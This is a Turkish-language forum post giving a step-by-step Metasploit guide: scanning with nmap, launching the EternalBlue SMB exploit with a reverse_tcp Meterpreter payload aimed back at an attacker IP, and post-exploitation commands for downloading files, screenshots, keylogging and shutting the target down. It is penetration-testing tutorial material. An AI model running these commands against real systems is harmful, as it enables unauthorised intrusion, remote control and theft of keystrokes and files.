Metasploit Kullanım Rehberi

io

👑
Yetkili
Katılım
30 Temmuz 2024
Konular
39
Mesajlar
85
Tepkime puanı
50
TL
70
Metasploit, sistem açıklarını tespit etmek, test etmek ve sömürmek için kullanılan güçlü bir çerçevedir. İçerisinde çeşitli araçlar ve exploit'ler barındırır. Kali Linux gibi siber güvenlik dağıtımlarında hazır olarak gelir.

Metasploit'i Çalıştırma ve Başlangıç Adımları
Kod:
msfconsole
Bu komut, Metasploit'in ana konsolunu başlatır.

Hedef Sistemi Tarama
Metasploit ile bir hedef sistemi taramak için nmap kullanılabilir:
Kod:
nmap -sV -p 1-1000 <hedef_ip>
Çıktıda, hedef sistemde açık olan portlar ve çalışan servisler gösterilir.

Exploit Seçimi
Hedef sistemde açık olduğu tespit edilen bir servis için exploit seçilir:
Kod:
use exploit/<exploit_yolu>
Örnek:
Kod:
use exploit/windows/smb/ms17_010_eternalblue

Payload Seçimi
Payload, hedef sistemde çalıştırılacak zararlı kodu ifade eder:
Kod:
set payload <payload_ismi>
Örnek:
Kod:
set payload windows/meterpreter/reverse_tcp

Gerekli Parametrelerin Ayarlanması
Hedef IP ve saldırganın IP bilgileri (LHOST, RHOST gibi) ayarlanır:
Kod:
set RHOST <hedef_ip>
set LHOST <saldırgan_ip>
set LPORT 4444

Exploit'in Çalıştırılması
Ayarlar yapıldıktan sonra exploit başlatılır:
Kod:
exploit
veya
Kod:
run
------------------------------------------------------------------------------------------------------------------

Meterpreter Komutları

Hedef sistemde başarıyla oturum açıldıktan sonra Meterpreter kullanılabilir:
Bilgi toplama
Kod:
sysinfo           # Sistem bilgilerini gösterir
getuid            # Geçerli kullanıcı adını gösterir

Dosya Yönetimi
Kod:
ls                # Dosyaları listeler
cd <dizin>        # Dizin değiştirir
download <dosya>  # Dosya indirir
upload <dosya>    # Dosya yükler

Ekran Görüntüsü Alma
Kod:
screenshot

Klavye Dinleme (Keylogger)
Kod:
keyscan_start     # Keylogger başlatır
keyscan_dump      # Toplanan tuş vuruşlarını gösterir

Hedef Sistemi Kapatma veya Yeniden Başlatma
Kod:
shutdown          # Sistemi kapatır
reboot            # Sistemi yeniden başlatır

-------------------------------------------------------------------------------------------------------

Kullanışlı Komutlar

Modülleri Araştırma
Kullanılabilir exploit veya payload'ları bulmak için:
Kod:
search <anahtar_kelime>
Örnek:
Kod:
search eternalblue

Seçilen Modülün Detaylarını Görme
Modül hakkında bilgi almak için:
Kod:
info

Ayarları Listeleme
Seçilen exploit veya payload için ayarları görmek:
Kod:
show options

Tüm Exploit ve Payload'ları Görüntüleme
Kod:
show exploits
show payloads